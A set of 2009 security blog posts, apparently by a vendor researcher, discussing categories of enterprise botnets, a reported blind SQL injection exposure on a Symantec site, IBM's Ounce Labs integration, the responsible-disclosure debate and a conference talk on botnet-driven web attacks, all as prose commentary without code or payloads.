Wednesday, November 25, 2009

Enterprise Botnets - Targeted or What?

Whats the difference between these massive botnets gobbling up sizable chunks of the Internet and those found inside the enterprise? Quite a bit actually.

Over the last couple of months I’ve been talking at a number of conferences and speaking with customers about the kinds of botnets we observe within enterprise networks as opposed to whats generally seen propagating the Internet at large. As you’d expect, there are a number of differences – partly because of the types of bad actors targeting businesses, and partly because enterprise perimeter security is considerably more advanced than that found at the end of the average DSL Internet connection.

From a cross-network visibility perspective, the types of botnets regularly encountered operating within enterprises in 2009 can best be divided (and described) as follows:

Internet Targeted – or “broad-spectrum” attack for want of a better description – account for approximately half of all botnets regularly encountered inside enterprise networks. These botnets aren’t targeted at any particular network – just at the average Internet user – but they typically manage to infiltrate enterprise networks due to lax security policies and as bleed-over from the other networks (and devices) employees may connect to. I discussed some of this in the earlier blog – Botnet bleed-over in to the enterprise – in which botnets designed to steal online gaming authentication credentials often appear within the enterprise. Just about all of these broad-spectrum botnets can self-propagate using an assortment of built-in worming capabilities. Fortunately, just about every one of these botnets are easily detected with standard host-based antivirus products.

What this means in practice however is that hosts “not quite” adhering to the corporate security policy, or which are a little behind in apply the latest patches (including not running the very latest signatures for their antivirus package), are the first to fall victim – and no organization I’ve observed in the last 20 years has ever managed implement their security uniformly throughout the entire enterprise.

I foresee that these “broad-spectrum” botnets will continue to appear within enterprises and be a nuisance to enterprise security teams. That said though, just because they aren’t targeted and fixes are available, it doesn’t mean that there’s no threat. If a particular botnet agent doesn’t yield value to its original botnet master (e.g. a botnet focused on obtaining passwords for social networking sites), it is quickly passed on to other operators that can make money from it – repurposing the compromised host and installing new malware agents that will yield value to the new owner.

Enterprise Targeted botnets are botnets that are hardly ever found circulating the Internet, and are designed to both penetrate and propagate within enterprise networks alone. Around 35% of botnets encountered within enterprise networks are this type. They are typically based upon sophisticated multi-purpose Remote Access Trojans (RAT); often blended with worming functions capable of using exploits against standard network services (services that are typically blocked by perimeter firewal technologies). Perhaps the most visible identifier of a botnet targeted at enterprises is the native support for network proxies – i.e. they’re proxy-aware – and capable of leveraging the users credentials for navigating command and control (CnC) out of the network.

In general, these “targeted” botnets aren’t targeted at a specific organization, but at a particular industry (i.e. online retail companies) or category of personnel within the organization (e.g. the CFO).The botnet agents tend to more advanced (on average) than most botnet malware encountered within enterprise networks – offering greater flexibility for the botnet masters to navigate the network and compromise key assets, and to be able to extract any valuable information they manage to obtain.

Deep Knowledge botnets are a completely different beast. Accounting for 10% of the botnets encountered within typical enterprise networks, these botnets tend to rely upon off-the-shelf malware components (more often than not, being built from commercial DIY malware creator kits). Depending upon the investment made by the botnet master, the features of the botnet agent can be very sophisticated or run-of-the-mill. What makes them so dangerous though is that the creator (who is often the botnet master) has a high degree of knowledge about the infiltrated enterprise – and already knows where to find all the valuable information. In some cases specific people or systems are targeted as beachheads in to the organization, while in others key organization-specific credentials are used to navigate the network.

Where this “deep knowledge” comes from can vary considerably. Each botnet within this category tends to be unique. I’ve come to associate these botnets with past or present employees (rather than industrial espionage) – as it’s not uncommon to be able to associate the CnC server of the botnet to a DSL or cable Internet IP address in the same city as the office or building that has been breached. In some cases I wouldn’t be surprised if the installation of these botnet agents were conducted by hand as a means of (semi)legitimate remote administration (think back to the problem in the mid-1990’s when people were installing modems in to their work computers so they could access them remotely). The problem though is that most of these commercial DIY malware construction kits have been backdoored by their creators (or “partners” in their distribution channel) – which means that any corporate assets infected with the botnet agent will find themselves under the control of multiple remote users.

Other” represents the catch-all for remaining 5% of botnets encountered within enterprise networks. These botnets (and the malware they rely upon) vary considerably in both sophistication and functionality, and don’t fit neatly in to any of the previous three categories. They include the small botnets targeted at an organization for competitive advantage, through to what can only be guessed at as being state-sponsored tools targeting specific industries and technologies.

It’ll be interesting to see how the distribution of these four categories of botnets change in 2010. I suspect that the proportions will remain roughly the same – with the “other” category decreasing over time, and being largely absorbed in to the “Enterprise Targeted” category rather than “Deep Knowledge”.

==> Reposted from http://blog.damballa.com/

Monday, November 23, 2009

Symantec Site Vulnerable to Blind SQL Injection

It looks as if Symantec has a bit of a problem with Blind SQL Injection. Unu has uncovered the vulnerability lying in one of Symantec's public Internet portals.

Using a couple of off-the-shelf tools - Pangolin and sqlmap - it's possible to enumerate the back-end databases supporting the public Internet web site - and this is what Unu appears to have been done.

Blind SQLi isn't a particularly sophisticated vulnerability, but it is often a labor intensive type of attack - not to mention rather noisy (due to the repeated requests and incremental guessing of characters that make up the database objects). That said, there are a bundle of tools out there that'll do all this work for you - so you don't need to be particularly security-savy to do this. In fact you probably don't even to need to know what SQL is since the tools take care of everything for you.

I discussed some of this the other week at the OWASP conference. Today these kinds of tools and features are becoming standard within botnets - which means that exploitation of these vulnerabilities and enumeration of the the database' data can be conducted in a few minutes - way before a security team can actively respond to the attack and close down the breach and loss of confidential data.

After enumerating the Symantec Web server, it would seem that there is data covering a number of Symantec products Oasis, Northwind, OneCare, as well as a couple of very interesting storage points relating to Norton and SymantecStore.

Based upon whats visible upon Unu's site, the Symantec store contains over 70,000 rows - which appear to be customer records, complete with clear-text passwords - that's bad and dumb! (Symantec should know better).

Oh, and there appears to be something like 122k records associated with product serial numbers.

I'm hoping that Symantec are dealing with this vulnerability and closing it down (as it's not clear whether Unu provided Symantec with prior knowledge of this vulnerability). In the meantime, they may want to start looking for a new security vendor to do some WebApp pentests.

Tuesday, November 17, 2009

IBM, OWASP's O2 and Dinis

Last week I was in Washington DC speaking at the annual OWASP AppSec conference. While there and acquaintance of mine - Dinis Cruz - posted a series of blogs concerning IBM, Ounce Labs, OWASP's O2 project and his mix in the equation - as well as presenting upon the status of O2. The crux of the blog series covers Dinis' analysis of why the recent purchase and integration of Ounce Labs in to IBM could work (but isn't) and a home for O2.

A few people have commented on the blog series - most notably R'Snake - in particular as it relates to the O2 project.

To be perfectly honest I'm not that familiar with the O2 project - having never gotten my hands dirty playing with it - but I know from experience how valuable similar tool integration frameworks are. From a pure-play consulting perspective, the ability to automate the dissection of results from multiple static analysis tools is money in the bank, and as such most security consulting practices offering code analysis services have typically invested their own time and money building similar tools. But custom integration paths are a substantial cost to consulting companies - so an Open Source framework has a lot of appeal (if it's good enough).

That said, Open Source projects like O2 typically have little to no appeal for any but the smallest MSSP and SaaS providers. Such service providers - seeking to build managed offerings around the integration and consolidated output of commercial (and freeware) tools - suffer from intense pressure by investors (and potential acquisition/merger partners) to not include Open Source code due to licensing and intellectual property disclosure concerns. Taking O2 down a commercial route eventually (or offering a seperate route like SNORT/SourceFire) would however have an appeal in these cases.

Shifting focus back to IBM and the acquisition and integration of Ounce Labs technology in to the Rational software portfolio - I share several of Dinis' concerns. From what I understand (and overheard at the OWASP conference), the Ounce Labs technologies are rolling under the Watchfire product team and being integrated together - which I would see as a sensible course of action, but would effectively mean the end of the "Ounce Labs" brand/product label. NOt that that really matters to the market, but it does tend to turn-off many of the employees that transitioned to IBM as part of the acquisition. Having said all that though, the WatchFire team are a bunch of very smart people and they were already well on the way to having developed their own static analysis tools that would have directly competed with Ounce Labs (at least in the Web-based language frameworks) - so this current integration is largely a technology-path accelerator rather than a purchase of new technology.

Dinis proposes a story - well, more of a "plot" - in which IBM can fulfil the requirements of a fictitious customer with an end-to-end solution. His conclusion is that IBM has all the necessary components and is more than capable of building the ultimate solution - but it's going to be a hard path and may never happen in practice.

I can understand the motivations behind his posts - particularly after personally passing through the IBM acquisition and integration of ISS. IBM has so much potential. It has some of the brightest researchers I have ever encountered in or out of academia and some of the best trained business executives in the world - however, it's a monster of a company and internal conflict over ownership (of strategy, the customer, and key concepts such as "security") between divisions and "brands" appears all to often to sink even the best made plans or intentions.

My advice to Dinis in making up his mind whether to stay with IBM or to move on would be this... if you enjoy working on exciting problems, inventing new technologies and changing focus completely every 2-4 years, but aren't overly concerned whether your research and technology will actually make it to a commercial product - then IBM is great (you can even start planning your retirement). However, if you're like me and the enjoyment lies in researching new technologies and solving problems that customers will actually use and be commercially available in the same year (or decade?) you worked on them, then it's unlikely you'd find IBM as fulfilling. IBM's solution momentum is unstopable once it gets going - but it takes a long time to get there things rolling and is pretty hard to change course once its rolling.

Sunday, November 15, 2009

"Responsible Disclosure" - Friend or Foe

It's been an interesting weekend on the "responsible disclosure" front. Reactions and tweet threads from several noted vulnerability researchers in response to K8em0's blog post (Behind the ISO Curtain) most notably those of Halvar Flake via his post (Why are most researchers not a fan of standards on "responsible disclosure" have been fast and (semi)furious.

On one hand it seems like a typical, dare I say it "annual", flareup on the topic. But then again, the specter of some ill-informed ISO standard being developed as a guide for defining and handling responsible disclosure was sure to escalate things.

To my mind, Halvar makes a pretty good argument for the cause that any kind of "standard" isn't going to be worth the paper its printed on. I particularly liked the metaphor...
"if I can actually go and surf, why would I discuss with a bunch of people sitting in an office about the right way to come back to the beach ?"
But the discussion isn't going away...

While I haven't seen anything on this ISO project (ISO/IEC NP 29147 Information technology - Security techniques - Responsible Vulnerability Disclosure) I suspect strongly that it has very little to do with the independent vulnerability researchers themselves - and seems more focused on how vendors should aim to disclose (and dare I say "coordinate" disclosures) publicly. In general most vendor-initiated vulnerability disclosures have been mostly responsible - but in cases where multiple vendors are involved, coordination often breaks down and slivers of 'ir' appear in front 'responsible'. The bigger and more important a multi-vendor security vulnerability is, the more likely it's disclosure will be screwed up.

Maybe this ISO work could help guide software vendors in dealing with security researchers and better handling disclosure coordination. It would be nice to think so.

Regardless, I think the work of ICASI is probably more useful - in particular the "Common Frameworks for Vulnerability Disclosure and Response (CVRF)" - and would probably bleed over in to some ISO work eventually. There are only a handful of vendors participating in the consortium (Cisco, Microsoft, IBM, Intel, Juniper and Nokia), but at least they're getting their acts together and working out a solution for themselves. I may be a little biased though since I was briefly involved with ICASI when I was with IBM. Coordination and responsible disclosure amongst these vendors is pretty important - eat your own dog-food and all that lark.

At the end of the day, trying to impose standards for vulnerability disclosure upon independent researchers hasn't and isn't going to work - even if these "standards" were ever to be enshrined in to law.

Monday, November 9, 2009

Clubbing WebApps with a Botnet - OWASP AppSec 2009

Back from vacation, fully refreshed, and back to the blog (and conference speaking)...

This week I'll be in Washington DC for the annual OWASP US conference - AppSec USA 2009. I'm speaking Thursday morning (10:45am-11:30am) on the topic of "Clubbing Web Applications with a Botnet", where I'll be covering the threat to Web applications from botnets - in particular they way they can (and are) used as force multipliers in brute-forcing and SQL Injection attacks.

A quick abstract for the talk is as follows:
The lonely hacker taking pot-shots at a Web application – seeking out an exploitable flaw - is quickly going the way of the dinosaur. Why try to hack an application from a solitary host using a single suite of tools when you can distribute and load-balance the attack amongst a global collection of anonymous bots and even ramp up the pace of attack by several orders of magnitude? If you’re going to _really_ hack a Web application for commercial gain, the every-day botnet is now core equipment in an attacker’s arsenal. Sure, DDoS and other saturation attacks are possible – but the real benefits of employing botnets to hack Web applications come from their sophisticated scripting engines and command & control which allow even onerous blind-SQL-injection attacks to be conducted in minutes rather than days. If someone’s clubbing your Web application with a botnet, where are your weaknesses and how much time have you really got?
I spoke briefly on the topic earlier this year at the OWASP Europe conference, but will be covering some new research in to techniques and trends - in particular the growing viability of Blind SQL Injection techniques.

If you happen to be in DC Thursday/Friday, drop by the conference. If you're already planning on attending the OWASP conference, make sure you attend my talk in the morning.